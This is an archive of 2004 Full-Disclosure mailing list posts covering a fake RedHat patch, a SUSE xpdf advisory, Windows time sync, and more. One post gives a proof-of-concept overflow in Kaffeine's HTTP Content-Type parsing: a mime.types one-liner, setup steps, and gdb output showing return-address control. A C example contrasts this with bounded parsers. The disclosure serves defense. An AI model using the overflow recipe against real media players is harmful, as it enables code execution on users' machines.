Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Mike Hoye (mhoyeneon.polkaroo.net)
Date: Mon Oct 25 2004 - 15:23:06 CDT


On Mon, Oct 25, 2004 at 08:33:41AM -0700, Denis Dimick wrote:
> Use GPG and keychain to store the key.

I've written a little widget that lets you "encrypt" a file using
another file as the "key"; I put those things in quotes because
it's a dumb little thing that does a quick-and-simple xor of the
first file against the other. I realize that this is barely
something you'd call encryption, but it might fill your needs.

It's called xork and it comes with no warranty whatsoever.

http://off.net/~mhoye/xork/

If anyone who is smarter than I am would like to suggest anything,
I'd be glad to hear it.

- Mike Hoye

--
"Theology is the effort to explain the unknowable in terms of the not
worth knowing." - H. L. Mencken



 
Re: [security] Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Brett Campbell (brettcustom-tech.net)
Date: Mon Oct 25 2004 - 16:07:27 CDT


On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew Farmer wrote:
<snip>
> I did a quickie analysis of the program (which is basically just
> distributed as source!).
<snip>

when did you get a hold of the tarball? they must've yanked the record
for www.fedora-redhat.com ... it can't be resolved in any way.

pretty interesting (and pathetic) anyways, nice detective work.

--
[ Brett R. Campbell ]
 -> Configuration Management / Systems Administration
 -> Collaborative Agent Design Research Center
 -> California Polytechnic State University, SLO, CA
 http://www.cadrc.calpoly.edu/frameset_content/content_about_us.html



 
[Full-Disclosure] PTms04-030

From: pigrelax (pigrelaxyandex.ru)
Date: Tue Oct 26 2004 - 03:21:38 CDT


PTms04-030 - tool for checking WebDAV XML DoS vulnerability.

More information and download:

http://www.securitylab.ru/tools/48998.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Kaffeine Media Player Content Type overflow

From: KF (kfinisterresecnetops.biz)
Date: Mon Oct 25 2004 - 20:06:24 CDT


Author did not respond and I could not exploit... enjoy.
there will be a proper advisory when I am not being so lazy
-KF

Kaffeine >=0.4.2
http://kaffeine.sourceforge.net/download.html

Tested on SuSE Linux 9.1 on source compiled from kaffeine-0.4.3b.tar.bz2
also Tested on various SuSE and Fedora RPMS

On SuSE Linux 9.1 (i586) - Kernel 2.6.5-7.108-default
http://www.suse.com/us/private/download/linuks/i386/update_for_9_1/extra.html
1558f5f4178cc1acbac0a068fb0bf43c kaffeine.rpm

ftp://packman.iu-bremen.de/testing/xine-cvs/kaffeine/
kaffeine-0.5cvs-200409180035.i686.rpm

ftp://packman.iu-bremen.de/suse/9.1/i686/
kaffeine-0.4.3b-0.pm.0.i686.rpm

http://rpm.pbone.net/index.php3/stat/17/dept/5/idg/Productivity_Multimedia_Video_Players
kaffeine-0.4.2-6.i586.rpm

Fedora Core release 2.90 (FC3 Test 1) Kernel 2.6.7-1.478custom on an i686
http://rpmseek.com/rpm-pl/kaffeine.html?hl=com&cx=0::
kaffeine-0.4.3-0.lvn.1.b.2.i386.rpm
kaffeine-0.4.3-0.lvn.1.b.1.i386.rpm

This can be triggered via any Real Audio Media - ram playlist file.

kaffeine-0.4.3b/kaffeine/playlist.cpp:
These are your file limitations.
PlayList::LoadRamPlaylist( const KURL& kurl, QListViewItem* after)
..
    /* check for ram playlist */
     if ( (ext == "ra") || (ext == "rm") || (ext == "ram") || (ext == "lsc") || (ext == "pl") )
     {
...
  
The overflow occurs here.
kaffeine-0.4.3b/kaffeine/http.c:

static http_t *http_open (const char *mrl) {

  http_t *this;
...
        /* no field width on %s: the header value is copied into mime_type without a bound */
        if (sscanf(this->buf, "Content-Type: %s", mime_type) == 1) {

Sample exploitation.

To trigger it, modify /etc/mime.types so that the .ram extension maps to
AAAAAAAAAAAAAAAAAAAAA.... instead of audio/x-pn-realaudio

linux:/srv/www/htdocs # echo `perl -e 'print "A" x 316 . "ZZZZABCD"'` ram > /etc/mime.types ; /etc/init.d/apache2 restart
Syntax OK
Shutting down httpd2 (waiting for all children to terminate) done
Starting httpd2 (prefork)

[rootthreat root]# kaffeine http://192.168.1.207/test.pl
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'
[rootthreat root]# KCrash: Application 'kaffeine' crashing...

create a file named exme.ram in your wwwroot
and create a file named test.pl with the contents:
http://host/exme.ram

Upon reading the test.pl file, either via http or via double click, kaffeine
will attempt to download the file exme.ram. It will check the mimetype
that the server is offering and proceed to copy it into a small buffer.

This can also be exploited by directly viewing the .ram file.

exact eip hit looks like this
gdb) c
Continuing.
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type =
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -150400896 (LWP 2328)]
0x080b869c in SubtitleChooser::staticMetaObject ()
(gdb) bt
#0 0x080b869c in SubtitleChooser::staticMetaObject ()
#1 0x5a5a5a5a in ?? ()
#2 0x44434241 in ?? ()
#3 0x097a1200 in ?? ()
#4 0x00000000 in ?? ()
#5 0x00000000 in ?? ()
#6 0x00000000 in ?? ()
#7 0x00000000 in ?? ()
#8 0xfef17b28 in ?? ()
#9 0x09794b70 in ?? ()
#10 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#11 0x00000018 in ?? ()
#12 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#13 0x096c3770 in ?? ()
#14 0x096c3760 in ?? ()
#15 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#16 0xfef17b48 in ?? ()
#17 0x05ec8dea in malloc () from /usr/lib/libkdecore.so.4
Previous frame inner to this frame (corrupt stack?)

(gdb) i f
Stack level 0, frame at 0xfef17ae0:
 eip = 0x80b869c in SubtitleChooser::staticMetaObject(); saved eip
0x5a5a5a5a
 called by frame at 0xfef17ae4
 Arglist at 0xfef17ad8, args:
 Locals at 0xfef17ad8, Previous frame's sp is 0xfef17ae0
 Saved registers:
  ebp at 0xfef17ad8, eip at 0xfef17adc

0xfeea9b20: 'A' <repeats 200 times>...
0xfeea9be8: 'A' <repeats 116 times>, "ZZZZABCD"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
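The pattern in the post is a `%s` conversion with no field width, so the header value is copied into `mime_type` up to the first whitespace, whatever its length. The following C is an added example, not kaffeine's code: it computes whether a given Content-Type line would overrun a buffer of a given size under that pattern, shows the one-character fix (a field width, which truncates silently) beside a parser that rejects oversize values instead, and builds the 316-A header from the post as input. MIME_BUF = 256 is an assumption; the post does not give the real size of kaffeine's buffer, only that the saved return address sits 316 bytes past its start.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not kaffeine code. Models sscanf("Content-Type: %s")
 * from http.c beside a bounded parser. MIME_BUF is an assumed size. */
#define MIME_BUF 256
#define MIME_WIDTH 255          /* MIME_BUF - 1, leaves room for the NUL */
#define STR_(x) #x
#define STR(x) STR_(x)

/* Length of the token %s would consume: skip whitespace, run to whitespace/NUL. */
static size_t scanf_token_len(const char *p) {
    size_t n = 0;
    while (*p && isspace((unsigned char)*p)) p++;
    while (p[n] && !isspace((unsigned char)p[n])) n++;
    return n;
}

/* 1 if sscanf(line, "Content-Type: %s", buf) would write past a buf of bufsz
 * bytes (token plus NUL); 0 if it fits or the format would not match at all. */
int would_overflow(const char *line, size_t bufsz) {
    static const char prefix[] = "Content-Type:";
    if (strncmp(line, prefix, sizeof prefix - 1) != 0) return 0;
    size_t tok = scanf_token_len(line + sizeof prefix - 1);
    return tok != 0 && tok + 1 > bufsz;
}

/* Minimal fix: a field width caps what %s may store (excess is silently dropped). */
int parse_content_type_scanf(const char *line, char mime[MIME_BUF]) {
    return sscanf(line, "Content-Type: %" STR(MIME_WIDTH) "s", mime) == 1;
}

static int has_prefix_ci(const char *s, const char *prefix) {
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}

/* Hardened parser: header name matched case-insensitively, value length
 * checked before the copy; an oversize value is rejected, not truncated. */
int parse_content_type(const char *line, char *out, size_t outsz) {
    if (!has_prefix_ci(line, "content-type:")) return 0;
    const char *p = line + strlen("content-type:");
    while (*p == ' ' || *p == '\t') p++;
    size_t n = 0;
    while (p[n] && !isspace((unsigned char)p[n])) n++;
    if (n == 0 || n + 1 > outsz) return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* Constructed input in the shape of the post's header: n_a 'A's then "ZZZZABCD". */
static const char *build_long_header(size_t n_a) {
    static char line[4096];
    const char head[] = "Content-Type: ", tail[] = "ZZZZABCD\r\n";
    if (sizeof head - 1 + n_a + sizeof tail > sizeof line) return NULL;
    memcpy(line, head, sizeof head - 1);
    memset(line + sizeof head - 1, 'A', n_a);
    memcpy(line + sizeof head - 1 + n_a, tail, sizeof tail);   /* includes NUL */
    return line;
}

int long_header_overflows(size_t n_a, size_t bufsz) {
    const char *l = build_long_header(n_a);
    return l ? would_overflow(l, bufsz) : -1;
}

/* What each parser does with the long header: bit 0 = width-limited sscanf
 * accepted it (truncated), bit 1 = hardened parser accepted it. */
int long_header_accepted(size_t n_a) {
    char a[MIME_BUF], b[MIME_BUF];
    const char *l = build_long_header(n_a);
    if (!l) return -1;
    return parse_content_type_scanf(l, a) | (parse_content_type(l, b, sizeof b) << 1);
}

/* Parsed value for a single line, or NULL when the hardened parser rejects it. */
const char *parse_demo(const char *line) {
    static char out[MIME_BUF];
    return parse_content_type(line, out, sizeof out) ? out : NULL;
}

int main(void) {
    printf("'text/plain;' overflows a %d-byte buffer: %d\n", MIME_BUF,
           would_overflow("Content-Type: text/plain;\r\n", MIME_BUF));
    printf("316 A's + ZZZZABCD overflows: %d\n", long_header_overflows(316, MIME_BUF));
    printf("accepted by %%255s / by hardened parser (bit0/bit1): %d\n",
           long_header_accepted(316));
    return 0;
}
```

The post's own trace (saved EIP = 0x5a5a5a5a, i.e. "ZZZZ", after 316 A's) is what fixes the distance to the return address; the bug itself is the same for any `%s` without a width that lands in a fixed-size buffer, and a width alone only turns the overflow into silent truncation of a value the caller will then act on.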


 
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Stephen Jimson (alf1num3rikyahoo.com)
Date: Tue Oct 26 2004 - 04:57:59 CDT


<snip from the ISC's SANS>
The k-otik folks have an analysis of the bad things
that might happen if you follow the instructions in
the fake RedHat advisory that was reported in
yesterday's diary:

http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt

<snip>

the source code is also there

Steph

--- Brett Campbell <brettcustom-tech.net> wrote:

> On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew
> Farmer wrote:
> <snip>
> > I did a quickie analysis of the program (which is
> basically just
> > distributed as source!).
> <snip>
>
> when did you get a hold of the tarball? they must've
> yanked the record
> for www.fedora-redhat.com ... it can't be resolved
> in any way.
>
> pretty interesting (and pathetic) anyways, nice
> detective work.
>
> --
> [ Brett R. Campbell ]
> -> Configuration Management / Systems
> Administration
> -> Collaborative Agent Design Research Center
> -> California Polytechnic State University, SLO, CA
>

                
__________________________________
Do you Yahoo!?
Yahoo! Mail Address AutoComplete - You start. We finish.
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] SUSE Security Announcement: xpdf, gpdf, kpdf, pdftohtml, cups (SUSE-SA:2004:039)

From: Thomas Biege (thomassuse.de)
Date: Tue Oct 26 2004 - 05:46:03 CDT


-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

                        SUSE Security Announcement

        Package: xpdf, gpdf, kdegraphics3-pdf, pdftohtml, cups
        Announcement-ID: SUSE-SA:2004:039
        Date: Tuesday, Oct 26th 2004 10:30 MEST
        Affected products: 8.1, 8.2, 9.0, 9.1, 9.2
                                SUSE Linux Enterprise Server 8, 9
                                SUSE Linux Desktop 1.0
        Vulnerability Type: remote system compromise
        Severity (1-10): 5
        SUSE default package: yes
        Cross References: CAN-2004-0888
                                CAN-2004-0889

    Content of this advisory:
        1) security vulnerability resolved:
             - integer overflows
             - arithmetic errors
           problem description
        2) solution/workaround
        3) special instructions and notes
        4) package location and checksums
        5) pending vulnerabilities, solutions, workarounds:
            - freeradius denial of service problems
            - mpg123
            - squid
        6) standard appendix (further information)

______________________________________________________________________________

1) problem description, brief discussion

    Xpdf is a widely used fast PDF file viewer. Various other PDF viewers
    and PDF conversion tools use xpdf code to accomplish their tasks.
    Chris Evans found several integer overflows and arithmetic errors.
    Additionally, Sebastian Krahmer from the SuSE Security-Team found similar
    bugs in xpdf 3.
    These bugs can be exploited by tricking a user into opening a malformed PDF
    file. As a result the PDF viewer can be crashed, or code may even be
    executed.

2) solution/workaround

    Due to the wide usage of xpdf-based code we do not recommend switching to
    another PDF viewer as a workaround.
    You have to install the updates.

3) special instructions and notes

    Please restart all running instances of xpdf, gpdf, kpdf, pdftohtml, cups
    after updating successfully.

4) package location and checksums

    Please download the update package for your distribution and verify its
    integrity by the methods listed in section 3) of this announcement.
    Then, install the package using the command "rpm -Fhv file.rpm" to apply
    the update.
    Our maintenance customers are being notified individually. The packages
    are being offered to install from the maintenance web.

    Cups packages and all 9.2 packages will be available later.

    x86 Platform:

    SUSE Linux 9.1:
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pdftohtml-0.36-112.3.i586.rpm
      f17866987c9099ed8b0395d184adfffc
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/xpdf-3.00-64.21.i586.rpm
      d648d6e96013cc339dd424041f8bc973
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpdf-0.112.1-26.3.i586.rpm
      16864a7b7652a3183f9f8cac034cf70e
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kdegraphics3-pdf-3.2.1-67.6.i586.rpm
      8f09aa7927d9cdcfc52ab06e520b2441
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pdftohtml-0.36-112.3.i586.patch.rpm
      2d3da1271fc9e072186fca6aa1de8c5c
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/xpdf-3.00-64.21.i586.patch.rpm
      093d0aaa7f4fbe24afc722057cbe334e
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpdf-0.112.1-26.3.i586.patch.rpm
      3af8141ddfbdf558afdf4f2f8f94a9f8
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kdegraphics3-pdf-3.2.1-67.6.i586.patch.rpm
      0d765c907e89a91186e03d8c8de87857
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/pdftohtml-0.36-112.3.src.rpm
      d4892578f2d84c1bdbc36b0df9341607
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/xpdf-3.00-64.21.src.rpm
      d4c06775143e5e6fec7bc544d248daee
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/gpdf-0.112.1-26.3.src.rpm
      cfda8ff6f352e1bc4f827a3118521b25
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kdegraphics3-3.2.1-67.6.src.rpm
      bb4d96dd72f0ee94315afd7b4c81e16b

    SUSE Linux 9.0:
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pdftohtml-0.36-118.i586.rpm
      dc822cef09e27e169acd94cda1fb622a
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/xpdf-2.02pl1-141.i586.rpm
      c99912bc5656546b028a8c4fe0473a75
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pdftohtml-0.36-118.i586.patch.rpm
      58b8a44ae02482d19c73959bfd85e85e
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/xpdf-2.02pl1-141.i586.patch.rpm
      8055fbed4ac1e664706701e3b7d3e1bc
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/pdftohtml-0.36-118.src.rpm
      35e37ded2db7d772d854748e606f42d0
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/xpdf-2.02pl1-141.src.rpm
      d42fe2976009b8ab44d6c166caf0840c

    SUSE Linux 8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/xpdf-2.01-137.i586.rpm
      e198f2fc43f1f455676a9dc1ee42af5e
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/xpdf-2.01-137.i586.patch.rpm
      acb5181c10c7b365cca71ae307b11553
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/xpdf-2.01-137.src.rpm
      aada3bee6ac1517f50468777c49d8d91

    SUSE Linux 8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/xpdf-1.01-255.i586.rpm
      c0d7beba46d02e1090e9b6c7795a10c3
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/xpdf-1.01-255.i586.patch.rpm
      ac395b4518a4c83d2af7805f35626a22
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/xpdf-1.01-255.src.rpm
      5ec84289ef8ca520e78cc80360d05665

    x86-64 Platform:

    SUSE Linux 9.1:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/pdftohtml-0.36-112.3.x86_64.rpm
      2b0b08249164043db0e3a5b080b03f1d
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/xpdf-3.00-64.21.x86_64.rpm
      c10bbbb43b8af6bc4da4922ce2afaede
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/gpdf-0.112.1-26.3.x86_64.rpm
      7021ae8a2e9bc809240c8e953ef74fab
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kdegraphics3-pdf-3.2.1-67.6.x86_64.rpm
      94200c51e06e9f31bc13139ea66c1626
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/pdftohtml-0.36-112.3.x86_64.patch.rpm
      e0d057eeb94492d62be6794dfde196c9
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/xpdf-3.00-64.21.x86_64.patch.rpm
      ae9382a68c4d424cdee65324208f9e84
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/gpdf-0.112.1-26.3.x86_64.patch.rpm
      33a0a7fd7b0758175f465f8f1fa6ce36
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kdegraphics3-pdf-3.2.1-67.6.x86_64.patch.rpm
      c4629d75d822cf47b243cf34bd8cbacb
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/pdftohtml-0.36-112.3.src.rpm
      f2acee920bd51b347e072463edc8f6bc
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/xpdf-3.00-64.21.src.rpm
      5b5c9c5d9aa1ddff06f56f83cf0365d9
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/gpdf-0.112.1-26.3.src.rpm
      2e2b8e6903b724462f30c07db1e76755
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kdegraphics3-3.2.1-67.6.src.rpm
      e6988ea49a337ebd49f42d15afdeb188

    SUSE Linux 9.0:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/pdftohtml-0.36-118.x86_64.rpm
      942676168c21ac7253637dd3312e35d1
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/xpdf-2.02pl1-141.x86_64.rpm
      7a5076aec7aae7e6e05bf8d0f6b5e523
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/pdftohtml-0.36-118.x86_64.patch.rpm
      b14da314a640e3afd3e72f417937c461
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/xpdf-2.02pl1-141.x86_64.patch.rpm
      fd4047d3c5392d63040e576effb32df5
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/pdftohtml-0.36-118.src.rpm
      5300f04533ee5b490e1f7de0a29fd705
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/xpdf-2.02pl1-141.src.rpm
      dd9b695199beaea8122037705eb1a581

______________________________________________________________________________

5) pending vulnerabilities in SUSE Distributions and Workarounds:

    - freeradius
      Several bugs that can be abused to remotely crash freeradius have
      been discovered (CAN-2004-0938, CAN-2004-0960, CAN-2004-0961).
      New packages will be available soon.

    - mpg123
      A buffer overflow in mpg123 has been discovered. New packages will
      be available soon.

    - squid
      A bug in the ASN.1 parser of the SNMP module has been fixed which
      would have allowed an attacker to crash squid (CAN-2004-0918).
      Updates will be available soon.

______________________________________________________________________________

6) standard appendix: authenticity verification, additional information

  - Package authenticity verification:

    SUSE update packages are available on many mirror ftp servers all over
    the world. While this service is being considered valuable and important
    to the free and open source software community, many users wish to be
    sure about the origin of the package and its content before installing
    the package. There are two verification methods that can be used
    independently from each other to prove the authenticity of a downloaded
    file or rpm package:
    1) md5sums as provided in the (cryptographically signed) announcement.
    2) using the internal gpg signatures of the rpm package.

    1) execute the command
        md5sum <name-of-the-file.rpm>
       after you downloaded the file from a SUSE ftp server or its mirrors.
       Then, compare the resulting md5sum with the one that is listed in the
       announcement. Since the announcement containing the checksums is
       cryptographically signed (usually using the key securitysuse.de),
       the checksums show proof of the authenticity of the package.
       We recommend against subscribing to security lists that cause the
       email message containing the announcement to be modified so that
       the signature does not match after transport through the mailing
       list software.
       Downsides: You must be able to verify the authenticity of the
       announcement in the first place. If RPM packages are being rebuilt
       and a new version of a package is published on the ftp server, all
       md5 sums for the files are useless.

    2) rpm package signatures provide an easy way to verify the authenticity
       of an rpm package. Use the command
        rpm -v --checksig <file.rpm>
       to verify the signature of the package, where <file.rpm> is the
       filename of the rpm package that you have downloaded. Of course,
       package authenticity verification can only target an un-installed rpm
       package file.
       Prerequisites:
        a) gpg is installed
        b) The package is signed using a certain key. The public part of this
           key must be installed by the gpg program in the directory
           ~/.gnupg/ under the user's home directory who performs the
           signature verification (usually root). You can import the key
           that is used by SUSE in rpm packages for SUSE Linux by saving
           this announcement to a file ("announcement.txt") and
           running the command (do "su -" to be root):
            gpg --batch; gpg < announcement.txt | gpg --import
           SUSE Linux distributions version 7.1 and thereafter install the
           key "buildsuse.de" upon installation or upgrade, provided that
           the package gpg is installed. The file containing the public key
           is placed at the top-level directory of the first CD (pubring.gpg)
           and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .

  - SUSE runs two security mailing lists to which any interested party may
    subscribe:

    suse-securitysuse.com
        - general/linux/SUSE security discussion.
            All SUSE security announcements are sent to this list.
            To subscribe, send an email to
                <suse-security-subscribesuse.com>.

    suse-security-announcesuse.com
        - SUSE's announce-only mailing list.
            Only SUSE's security announcements are sent to this list.
            To subscribe, send an email to
                <suse-security-announce-subscribesuse.com>.

    For general information or the frequently asked questions (faq)
    send mail to:
        <suse-security-infosuse.com> or
        <suse-security-faqsuse.com> respectively.

    =====================================================================
    SUSE's security contact is <securitysuse.com> or <securitysuse.de>.
    The <securitysuse.de> public key is listed below.
    =====================================================================
______________________________________________________________________________

    The information in this advisory may be distributed or reproduced,
    provided that the advisory is not modified in any way. In particular,
    it is desired that the clear-text signature shows proof of the
    authenticity of the text.
    SUSE Linux AG makes no warranties of any kind whatsoever with respect
    to the information contained in this security advisory.

Type Bits/KeyID Date User ID
pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <securitysuse.de>
pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <buildsuse.de>

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
(public key block body omitted)
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iQEVAwUBQX4pgXey5gA9JdPZAQHb0wf+P6dH8VFUyh7nVV8xd6tb/ccBFtpMOaCa
Wq1i0754TcOpk6RKpVpzNEjB2bSh51aWvRykVEguQdo1MlpNZdlE5Zc/T38S+B3U
H2hzK9o2d9FAUxHFEpjSRRQxFdDEP7Hx3JV/OnVIqZfycVij0MaTSN6j9c7GSUZP
SQ97CdbMTgRe25lL2k1FofNaYpDKyng/yF78pxD8dI79abbupcJo7BokPtZ6yEGZ
AL2PT3OhyYX3HJphNJ+4wcRIS71IWhB54kA0igB1Qp83ltROgbz1rr9OgUwf3fDi
zvYGxNX4Eu0rxiaU6U81z+m5dScUoNMSM8CK+uZK/dn3iSHHNzjaLA==
=j7Hh
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Windows Time Synchronization - Best Practices

From: Airey, John (John.Aireyrnib.org.uk)
Date: Tue Oct 26 2004 - 07:10:21 CDT


> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com]On Behalf Of Andrew
> Farmer
> Sent: 25 October 2004 20:22
> To: Gary E. Miller
> Cc: Micheal Espinola Jr; full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] Windows Time Synchronization - Best
> Practices
>
>
> On 24 Oct 2004, at 18:48, Gary E. Miller wrote:
> > On Fri, 22 Oct 2004, Micheal Espinola Jr wrote:
> >> You can certainly have multiple time servers specified with Windows
> >> Time Service (SNTP). RTM. It has the ability to failover
> through a
> >> list.
> >
> > Yes you can have multiple time servers, but only one active
> at a time.
> > With NTP your client polls a number of diverse servers. Routes can
> > flap, servers can go wacko, but your time stays solid.
>
> The canonical *NIX ntp client supports multiple active servers, if
> that's what you're talking about.
>
> No idea about Windows, though.

Getting back to the poster's original question, Windows is really bad
for time synchronisation. Whereas you can set an NTP server to
UTC/GMT/ZULU (or whatever other name you are going to call it), Windows
does indeed move the clock forward and backward.

We've experienced this difficulty ourselves where you log in to a server
which then puts the clock an hour forward and then Windows itself puts
the clock an hour forward. The end result is that the clock is wrong.
Local time should simply be calculated as an offset from UTC. So instead
of changing the clock, change the time zone. Then it won't matter if the
time zone is changed to BST (for example) more than once. The clock and
the offset will stay the same.

Note to Microsoft - fix this stupidity in your next version of Windows.
It will annoy your users to begin with, but a number of time synch
issues will be solved in one fell swoop. All the three letter codes are
publicly available and understood by your end users.

--
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848
John.Aireyrnib.org.uk

Even if Embryonic Stem Cell Research yielded medical treatments, how
could enough eggs be obtained to make them viable? We can't even get
enough organs for transplant donation.

--
DISCLAIMER:

NOTICE: The information contained in this email and any attachments is
confidential and may be privileged. If you are not the intended
recipient you should not use, disclose, distribute or copy any of the
content of it or of any attachment; you are requested to notify the
sender immediately of your receipt of the email and then to delete it
and any attachments from your system.

RNIB endeavours to ensure that emails and any attachments generated by
its staff are free from viruses or other contaminants. However, it
cannot accept any responsibility for any such which are transmitted.
We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email and
any attachments are those of the author and do not necessarily represent
those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Ali Campbell (fdisclosurealicampbell.org.uk)
Date: Tue Oct 26 2004 - 11:11:31 CDT


Thanks to everyone who replied to this, I appreciate your time.

This issue has now been dealt with.

Ali

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Possibly a stupid question RPC over HTTP

From: Airey, John (John.Aireyrnib.org.uk)
Date: Tue Oct 26 2004 - 10:47:21 CDT


> -----Original Message-----
> From: Kyle Maxwell [mailto:krmaxwellgmail.com]
> Sent: 25 October 2004 04:30
> To: Airey, John
> Cc: full-disclosurelists.netsys.com
